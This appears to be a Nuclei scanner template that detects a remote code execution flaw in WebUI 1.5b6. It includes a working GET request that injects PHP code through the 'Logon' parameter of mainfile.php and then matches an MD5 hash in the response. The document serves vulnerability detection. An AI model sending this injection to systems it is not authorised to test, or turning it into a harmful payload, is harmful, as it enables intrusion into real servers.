Description
WebUI 1.5b6 is vulnerable to remote code execution because the 'mainfile.php' endpoint allows remote attackersto execute arbitrary code via the 'Logon' parameter.
WebUI 1.5b6 is vulnerable to remote code execution because the 'mainfile.php' endpoint allows remote attackersto execute arbitrary code via the 'Logon' parameter.
id: webui-rce
info:
name: WebUI 1.5b6 - Remote Code Execution
author: pikpikcu
severity: critical
description: WebUI 1.5b6 is vulnerable to remote code execution because the 'mainfile.php' endpoint allows remote attackersto execute arbitrary code via the 'Logon' parameter.
reference:
- https://www.exploit-db.com/exploits/36821
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cwe-id: CWE-77
metadata:
max-request: 1
tags: webui,rce,edb,vuln
http:
- method: GET
path:
- '{{BaseURL}}/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27'
matchers-condition: and
matchers:
- type: word
words:
- "c5b3d7397a90f42d222f7ed9408c0dc6"
part: body
- type: status
status:
- 200
# digest: 4b0a00483046022100c2607a103b71aba735b082bf1be62ff391960f1685e13b82e10d3691c2a7920c022100f994b4246a676fcc6db9900f87fc11885041e589c25c5e900bd14133460f33aa:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.